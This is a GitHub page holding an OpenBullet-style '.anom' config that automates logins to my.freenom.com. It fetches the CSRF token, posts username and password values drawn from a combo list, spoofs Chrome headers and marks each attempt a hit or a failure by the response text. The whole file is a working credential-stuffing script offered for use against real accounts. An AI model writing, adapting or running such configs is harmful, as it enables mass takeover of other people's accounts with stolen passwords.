-
Notifications
You must be signed in to change notification settings - Fork 12
/
Copy path[CT] - freenom_API.anom
82 lines (76 loc) · 2.37 KB
/
[CT] - freenom_API.anom
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
[SETTINGS]
{
"Name": "freenom.com",
"SuggestedBots": 1,
"MaxCPM": 0,
"LastModified": "2022-07-16T00:58:51.2078159+03:00",
"AdditionalInfo": "",
"Author": "saas",
"Version": "1.4.4 [Anomaly]",
"IgnoreResponseErrors": false,
"MaxRedirects": 8,
"NeedsProxies": false,
"OnlySocks": false,
"OnlySsl": false,
"MaxProxyUses": 0,
"BanProxyAfterGoodStatus": false,
"EncodeData": false,
"AllowedWordlist1": "",
"AllowedWordlist2": "",
"DataRules": [],
"CustomInputs": [],
"CaptchaUrl": "",
"Base64": "",
"Grayscale": false,
"RemoveLines": false,
"RemoveNoise": false,
"Dilate": false,
"Threshold": 1.0,
"DiffKeep": 0.0,
"DiffHide": 0.0,
"Saturate": false,
"Saturation": 0.0,
"Transparent": false,
"Contour": false,
"OnlyShow": false,
"ContrastGamma": false,
"Contrast": 1.0,
"Gamma": 1.0,
"Brightness": 1.0,
"RemoveLinesMin": 0,
"RemoveLinesMax": 0,
"Crop": false,
"ForceHeadless": false,
"AlwaysOpen": false,
"AlwaysQuit": false,
"DisableNotifications": false,
"CustomUserAgent": "",
"RandomUA": false,
"CustomCMDArgs": ""
}
[SCRIPT]
REQUEST GET "https://my.freenom.com/dologin.php"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"
PARSE "<SOURCE>" LR "<input type=\"hidden\" name=\"token\" value=\"" "\" />" -> VAR "token"
REQUEST POST "https://my.freenom.com/dologin.php"
CONTENT "token=<token>&username=<USER>&password=<PASS>"
CONTENTTYPE "application/x-www-form-urlencoded"
HEADER "origin: https://my.freenom.com"
HEADER "referer: https://my.freenom.com/clientarea.php"
HEADER "sec-ch-ua: \".Not/A)Brand\";v=\"99\", \"Google Chrome\";v=\"103\", \"Chromium\";v=\"103\""
HEADER "sec-ch-ua-mobile: ?0"
HEADER "sec-ch-ua-platform: \"Windows\""
HEADER "sec-fetch-dest: document"
HEADER "sec-fetch-mode: navigate"
HEADER "sec-fetch-site: same-origin"
HEADER "sec-fetch-user: ?1"
HEADER "upgrade-insecure-requests: 1"
HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
KEYCHECK
KEYCHAIN Success OR
KEY "Hello"
KEY "Edit Account Details"
KEYCHAIN Failure OR
KEY "Login Details Incorrect. Please try again."